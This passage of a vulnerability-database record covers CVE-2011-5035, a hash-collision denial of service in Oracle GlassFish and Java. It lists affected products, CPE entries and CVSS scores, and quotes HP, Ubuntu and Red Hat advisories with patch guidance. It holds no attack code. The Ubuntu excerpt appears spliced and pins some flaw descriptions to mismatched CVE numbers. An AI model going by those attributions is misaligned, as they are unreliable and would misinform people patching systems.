"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.021"
},
{
"_id": null,
"model": "jdk and jre",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "7.0.1"
},
{
"_id": null,
"model": "enterprise linux server optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "desktop extras",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "nonstop server j06.04.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "aura conferencing sp1 standard",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "java se sr5",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"_id": null,
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.2"
},
{
"_id": null,
"model": "nonstop server j06.04.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.2"
},
{
"_id": null,
"model": "nonstop server j06.06.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "ucosminexus primary server base",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.1"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.016"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.8"
},
{
"_id": null,
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.4"
},
{
"_id": null,
"model": "nonstop server h06.21.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "java se",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.07"
},
{
"_id": null,
"model": "nonstop server j06.06.03",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "nonstop server h06.17.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.1"
},
{
"_id": null,
"model": "call management system r",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "16.0"
},
{
"_id": null,
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1.1"
},
{
"_id": null,
"model": "aura messaging",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"_id": null,
"model": "network node manager i",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "9.1"
},
{
"_id": null,
"model": "aura system platform sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "linux enterprise desktop sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "ucosminexus service platform",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"_id": null,
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.2"
},
{
"_id": null,
"model": "jdk 1.6.0 01-b06",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "cosminexus developer light",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "rational synergy",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.0.2"
},
{
"_id": null,
"model": "virtual desktop infrastructure",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.3"
},
{
"_id": null,
"model": "nonstop server h06.20.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "ucosminexus client",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "conferencing standard edition",
"scope": "ne",
"trust": 0.3,
"vendor": "avaya",
"version": "7.0"
},
{
"_id": null,
"model": "nonstop server j06.10.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.1"
},
{
"_id": null,
"model": "enterprise linux desktop optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "nonstop server h06.17.03",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.017"
},
{
"_id": null,
"model": "enterprise linux hpc node supplementary",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "enterprise linux desktop supplementary client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "ucosminexus application server standard-r",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "ip office application server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.0"
},
{
"_id": null,
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"_id": null,
"model": "java system web server sp11",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "enterprise linux hpc node",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "nonstop server h06.16.02",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "rational synergy",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.0.5"
},
{
"_id": null,
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.4"
},
{
"_id": null,
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.1"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.2"
},
{
"_id": null,
"model": "java system web server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "nonstop server j06.05.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7"
},
{
"_id": null,
"model": "linux enterprise java sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.04"
},
{
"_id": null,
"model": "java se sr1",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "7"
},
{
"_id": null,
"model": "nonstop server h06.20.02",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "cosminexus developer no version",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.1"
},
{
"_id": null,
"model": "nonstop server j06.09.02",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "aura communication manager utility services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2"
},
{
"_id": null,
"model": "linux enterprise desktop sp1 for sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "nonstop server h06.17.02",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "nonstop server j06.08.03",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "aura conferencing standard",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "rational synergy",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.0.6"
},
{
"_id": null,
"model": "nonstop server j06.10.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "java system web server sp6",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.2"
},
{
"_id": null,
"model": "nonstop server h06.25.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "nonstop server h06.18.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "cosminexus application server no version",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.60"
},
{
"_id": null,
"model": "nonstop server h06.27",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "java se sr10",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6"
},
{
"_id": null,
"model": "nonstop server h06.17.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "nonstop server j06.14.02",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.2"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#903934"
},
{
"db": "BID",
"id": "51194"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003567"
},
{
"db": "NVD",
"id": "CVE-2011-5035"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:apple:mac_os_x",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:mac_os_x_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:oracle:java_system_web_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:oracle:application_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:oracle:communications_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:oracle:glassfish_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:oracle:iplanet_web_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:oracle:jrockit",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:oracle:java_system_application_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:oracle:weblogic_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hp:xp_9000_performance_advisor_software",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:cosminexus_application_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:cosminexus_client",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:cosminexus_developer",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:cosminexus_developers_kit_for_java",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:cosminexus_primary_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:cosminexus_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:cosminexus_studio",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:hirdb_for_java_xml",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:hitachi_developers_kit_for_java",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:processing_kit_for_xml",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_application_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_client",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_developer",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_operator",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_portal_framework",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_primary_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_service",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:internet_navigware_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:interstage_application_development_cycle_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:interstage_application_framework_suite",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:interstage_application_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:interstage_business_application_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:interstage_form_coordinator_workflow",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:interstage_job_workload_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:interstage_list_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:interstage_list_works",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:interstage_service_integrator",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:interstage_shunsaku_data_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:interstage_web_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:interstage_xml_business_activity_recorder",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:serverview",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:success_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:systemwalker_availability_view",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:systemwalker_desktop_inspection",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:systemwalker_it_change_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:systemwalker_it_process_master",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:systemwalker_operation_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:systemwalker_runbook_automation",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:systemwalker_service_catalog_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:systemwalker_service_quality_coordinator",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fujitsu:systemwalker_software_configuration_manager",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-003567"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "112144"
},
{
"db": "PACKETSTORM",
"id": "109793"
},
{
"db": "PACKETSTORM",
"id": "109834"
},
{
"db": "PACKETSTORM",
"id": "110035"
}
],
"trust": 0.4
},
"cve": "CVE-2011-5035",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2011-5035",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2011-5035",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#903934",
"trust": 0.8,
"value": "10.80"
},
{
"author": "NVD",
"id": "CVE-2011-5035",
"trust": 0.8,
"value": "Medium"
},
{
"author": "VULMON",
"id": "CVE-2011-5035",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#903934"
},
{
"db": "VULMON",
"id": "CVE-2011-5035"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003567"
},
{
"db": "NVD",
"id": "CVE-2011-5035"
}
]
},
"description": {
"_id": null,
"data": "Oracle Glassfish 2.1.1, 3.0.1, and 3.1.1, as used in Communications Server 2.0, Sun Java System Application Server 8.1 and 8.2, and possibly other products, computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters, aka Oracle security ticket S0104869. Some programming language implementations do not sufficiently randomize their hash functions or provide means to limit key collision attacks, which can be leveraged by an unauthenticated attacker to cause a denial-of-service (DoS) condition. Oracle Glassfish Calculates the hash value of the form parameter without restricting the assumption of hash collision. (CPU Resource consumption ) There is a vulnerability that becomes a condition.A third party can send a large amount of crafted parameters to disrupt service operation. (CPU Resource consumption ) There is a possibility of being put into a state. Oracle GlassFish Server is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue by sending specially crafted forms in HTTP POST requests. \nOracle GlassFish Server 3.1.1 and prior versions are vulnerable. \n\nRelease Date: 2012-03-26\nLast Updated: 2012-04-02\n\n ------------------------------------------------------------------------------\n\nPotential Security Impact: Remote unauthorized access, disclosure of information, and other vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These vulnerabilities could allow remote unauthorized access, disclosure of information, and other vulnerabilities. \n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.13 or earlier\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2011-3563 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4\nCVE-2011-5035 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2012-0497 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2012-0498 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2012-0499 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2012-0500 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2012-0501 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2012-0502 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4\nCVE-2012-0503 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2012-0504 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2012-0505 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2012-0506 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2012-0507 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following Java version upgrades to resolve these vulnerabilities. \nThe upgrades are available from the following location\n\nhttp://www.hp.com/go/java\n\nHP-UX B.11.11, B.11.23, B.11.31\n JDK and JRE v6.0.14 or subsequent\n\nMANUAL ACTIONS: Yes - Update\nFor Java v6.0.13 and earlier, update to Java v6.0.14 or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.11\nHP-UX B.11.23\nHP-UX B.11.31\n===========\nJre60.JRE60-COM\nJre60.JRE60-IPF32\nJre60.JRE60-IPF32-HS\nJre60.JRE60-IPF64\nJre60.JRE60-IPF64-HS\nJre60.JRE60-PA20\nJre60.JRE60-PA20-HS\nJre60.JRE60-PA20W\nJre60.JRE60-PA20W-HS\nJdk60.JDK60-COM\nJdk60.JDK60-IPF32\nJdk60.JDK60-IPF64\nJdk60.JDK60-PA20\nJdk60.JDK60-PA20W\naction: install revision 1.6.0.14.00 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) 27 March 2012 Initial release\nVersion:2 (rev.2) 2 April 2012 corrected CVE-2012-0507 score\n\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in the title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2012 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. HP has updated the Apache Tomcat and Oracle database software to\naddress vulnerabilities affecting confidentiality, availability, and\nintegrity. ============================================================================\nUbuntu Security Notice USN-1373-2\nMarch 01, 2012\n\nopenjdk-6b18 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 11.04\n- Ubuntu 10.10\n- Ubuntu 10.04 LTS\n\nSummary:\n\nMultiple vulnerabilities in OpenJDK 6 for the ARM architecture have\nbeen fixed. \n\nSoftware Description:\n- openjdk-6b18: Open Source Java implementation\n\nDetails:\n\nUSN 1373-1 fixed vulnerabilities in OpenJDK 6 in Ubuntu 10.04 LTS,\nUbuntu 10.10 and Ubuntu 11.04 for all architectures except for ARM\n(armel). This provides the corresponding OpenJDK 6 update for use\nwith the ARM (armel) architecture in Ubuntu 10.04 LTS, Ubuntu 10.10\nand Ubuntu 11.04. A remote attacker could\n cause a denial of service by sending special requests that trigger\n hash collisions predictably. This may be increased\n by adjusting the sun.net.httpserver.maxReqHeaders property. (CVE-2012-0497)\n \n It was discovered that an off-by-one error exists in the Java ZIP\n file processing code. An attacker could us this to cause a denial of\n service through a maliciously crafted ZIP file. (CVE-2012-0507)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 11.04:\n icedtea-6-jre-cacao 6b18-1.8.13-0ubuntu1~11.04.1\n icedtea-6-jre-jamvm 6b18-1.8.13-0ubuntu1~11.04.1\n openjdk-6-jre 6b18-1.8.13-0ubuntu1~11.04.1\n openjdk-6-jre-headless 6b18-1.8.13-0ubuntu1~11.04.1\n openjdk-6-jre-zero 6b18-1.8.13-0ubuntu1~11.04.1\n\nUbuntu 10.10:\n icedtea-6-jre-cacao 6b18-1.8.13-0ubuntu1~10.10.1\n openjdk-6-jre 6b18-1.8.13-0ubuntu1~10.10.1\n openjdk-6-jre-headless 6b18-1.8.13-0ubuntu1~10.10.1\n openjdk-6-jre-zero 6b18-1.8.13-0ubuntu1~10.10.1\n\nUbuntu 10.04 LTS:\n icedtea-6-jre-cacao 6b18-1.8.13-0ubuntu1~10.04.1\n openjdk-6-jre 6b18-1.8.13-0ubuntu1~10.04.1\n openjdk-6-jre-headless 6b18-1.8.13-0ubuntu1~10.04.1\n openjdk-6-jre-zero 6b18-1.8.13-0ubuntu1~10.04.1\n\nAfter a standard system update you need to restart any Java applications\nor applets to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Critical: java-1.6.0-openjdk security update\nAdvisory ID: RHSA-2012:0135-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2012-0135.html\nIssue date: 2012-02-14\nCVE Names: CVE-2011-3563 CVE-2011-3571 CVE-2011-5035 \n CVE-2012-0497 CVE-2012-0501 CVE-2012-0502 \n CVE-2012-0503 CVE-2012-0505 CVE-2012-0506 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.6.0-openjdk packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 6. \n\nThe Red Hat Security Response Team has rated this update as having critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base scores,\nwhich give detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit. \n\nIt was discovered that Java2D did not properly check graphics rendering\nobjects before passing them to the native renderer. Malicious input, or an\nuntrusted Java application or applet could use this flaw to crash the Java\nVirtual Machine (JVM), or bypass Java sandbox restrictions. (CVE-2012-0497)\n\nIt was discovered that the exception thrown on deserialization failure did\nnot always contain a proper identification of the cause of the failure. An\nuntrusted Java application or applet could use this flaw to bypass Java\nsandbox restrictions. (CVE-2012-0505)\n\nThe AtomicReferenceArray class implementation did not properly check if\nthe array was of the expected Object[] type. A malicious Java application\nor applet could use this flaw to bypass Java sandbox restrictions. \n(CVE-2011-3571)\n\nIt was discovered that the use of TimeZone.setDefault() was not restricted\nby the SecurityManager, allowing an untrusted Java application or applet to\nset a new default time zone, and hence bypass Java sandbox restrictions. \n(CVE-2012-0503)\n\nThe HttpServer class did not limit the number of headers read from HTTP\nrequests. A remote attacker could use this flaw to make an application\nusing HttpServer use an excessive amount of CPU time via a\nspecially-crafted request. This update introduces a header count limit\ncontrolled using the sun.net.httpserver.maxReqHeaders property. The default\nvalue is 200. (CVE-2011-5035)\n\nThe Java Sound component did not properly check buffer boundaries. \nMalicious input, or an untrusted Java application or applet could use this\nflaw to cause the Java Virtual Machine (JVM) to crash or disclose a portion\nof its memory. (CVE-2011-3563)\n\nA flaw was found in the AWT KeyboardFocusManager that could allow an\nuntrusted Java application or applet to acquire keyboard focus and possibly\nsteal sensitive information. 